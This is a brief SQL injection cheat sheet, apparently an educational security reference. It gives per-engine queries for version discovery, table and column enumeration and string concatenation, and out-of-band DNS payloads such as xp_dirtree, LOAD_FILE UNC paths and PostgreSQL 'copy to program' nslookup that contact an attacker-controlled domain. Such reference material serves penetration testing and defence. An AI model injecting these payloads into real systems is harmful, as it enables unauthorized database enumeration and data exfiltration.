Introduction Once SQL injection has been identified, the next step is to enumerate the underlying database engine. Unfortunately, each database engine uses its own syntax for metadata, which makes this process highly engine-dependent.
Database Version Database Version Info Oracle SELECT banner FROM v$version SELECT version FROM v$instance Microsoft SELECT @@version PostgreSQL SELECT version() MySQL SELECT @@version
Database Contents Listing tables and the columns they contain:
Database Contents Info Oracle SELECT * FROM all_tables SELECT * FROM all_tab_columns WHERE table_name = 'Table Name' Microsoft SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name' PostgreSQL SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name' MySQL SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
String Concatenation Database Concatenation Oracle 'a'||'b' Microsoft 'a'+'b' PostgreSQL 'a'||'b' MySQL 'a' 'b' (space) or CONCAT('a','b')
DNS Lookups Database Lookup Syntax Oracle SELECT UTL_INADDR.get_host_address('domain') - requires elevated privileges Microsoft exec master..xp_dirtree '//domain/a' PostgreSQL copy (SELECT '') to program 'nslookup domain MySQL These work only on Windows LOAD_FILE('\\\\domain\\a') SELECT ... INTO OUTFILE '\\\\domain\a'
April 3, 2026 April 3, 2026